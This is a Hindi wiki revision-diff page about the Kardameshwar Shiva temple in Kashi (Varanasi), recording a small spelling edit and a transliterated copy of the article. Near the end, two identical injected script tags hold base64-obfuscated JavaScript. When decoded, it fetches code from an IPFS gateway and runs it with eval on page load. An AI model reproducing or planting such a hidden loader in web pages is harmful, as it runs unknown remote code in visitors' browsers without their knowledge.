Difference between revisions of "कर्दमेश्वर मंदिर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " करीब" to " क़रीब")
Line 1: Line 1:
 
[[चित्र:Kardameshwar-varanasi.jpg|thumb|कर्दमेश्वर मंदिर, [[वाराणसी]]]]
 
[[चित्र:Kardameshwar-varanasi.jpg|thumb|कर्दमेश्वर मंदिर, [[वाराणसी]]]]
'''कर्दमेश्वर मंदिर''' [[काशी]] ([[वाराणसी]]) का सबसे प्राचीन शिवमंदिर है। यह करीब 1 हजार वर्ष पुराना मंदिर है। पंचक्रोशी मार्ग पर पड़ने वाले कंदवा गांव में यह मंदिर स्थित है। मंदिर की स्थापत्य कला बेहतरीन है। पंचक्रोशी यात्रा करने वाले यात्री यहाँ दर्शन-पूजन करने के पश्चात आगे की यात्रा करते है। [[महाशिवरात्रि]] के दिन इस मंदिर में श्रद्धालुओं का तांता लगा रहता है। वहीं, [[सावन]] में कांवरियों सहित स्थानीय लोग भी दर्शन-पूजन करते हैं।<ref>{{cite web |url=http://www.kashikatha.com/%E0%A4%A6%E0%A4%B0%E0%A5%8D%E0%A4%B6%E0%A4%A8%E0%A5%80%E0%A4%AF-%E0%A4%B8%E0%A5%8D%E0%A4%A5%E0%A4%B2/%E0%A4%AE%E0%A4%82%E0%A4%A6%E0%A4%BF%E0%A4%B0/ |title=मंदिर|accessmonthday=10 जनवरी |accessyear=2014 |last= |first= |authorlink= |format= |publisher=काशी कथा |language=हिंदी }}</ref>
+
'''कर्दमेश्वर मंदिर''' [[काशी]] ([[वाराणसी]]) का सबसे प्राचीन शिवमंदिर है। यह क़रीब 1 हजार वर्ष पुराना मंदिर है। पंचक्रोशी मार्ग पर पड़ने वाले कंदवा गांव में यह मंदिर स्थित है। मंदिर की स्थापत्य कला बेहतरीन है। पंचक्रोशी यात्रा करने वाले यात्री यहाँ दर्शन-पूजन करने के पश्चात आगे की यात्रा करते है। [[महाशिवरात्रि]] के दिन इस मंदिर में श्रद्धालुओं का तांता लगा रहता है। वहीं, [[सावन]] में कांवरियों सहित स्थानीय लोग भी दर्शन-पूजन करते हैं।<ref>{{cite web |url=http://www.kashikatha.com/%E0%A4%A6%E0%A4%B0%E0%A5%8D%E0%A4%B6%E0%A4%A8%E0%A5%80%E0%A4%AF-%E0%A4%B8%E0%A5%8D%E0%A4%A5%E0%A4%B2/%E0%A4%AE%E0%A4%82%E0%A4%A6%E0%A4%BF%E0%A4%B0/ |title=मंदिर|accessmonthday=10 जनवरी |accessyear=2014 |last= |first= |authorlink= |format= |publisher=काशी कथा |language=हिंदी }}</ref>
  
  

Revision as of 14:09, 16 November 2014

[[chitr:Kardameshwar-varanasi.jpg|thumb|kardameshvar mandir, varanasi]] kardameshvar mandir kashi (varanasi) ka sabase prachin shivamandir hai. yah qarib 1 hajar varsh purana mandir hai. panchakroshi marg par p dane vale kandava gaanv mean yah mandir sthit hai. mandir ki sthapaty kala behatarin hai. panchakroshi yatra karane vale yatri yahaan darshan-poojan karane ke pashchat age ki yatra karate hai. mahashivaratri ke din is mandir mean shraddhaluoan ka taanta laga rahata hai. vahian, savan mean kaanvariyoan sahit sthaniy log bhi darshan-poojan karate haian.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. mandir (hiandi) kashi katha. abhigaman tithi: 10 janavari, 2014.

sanbandhit lekh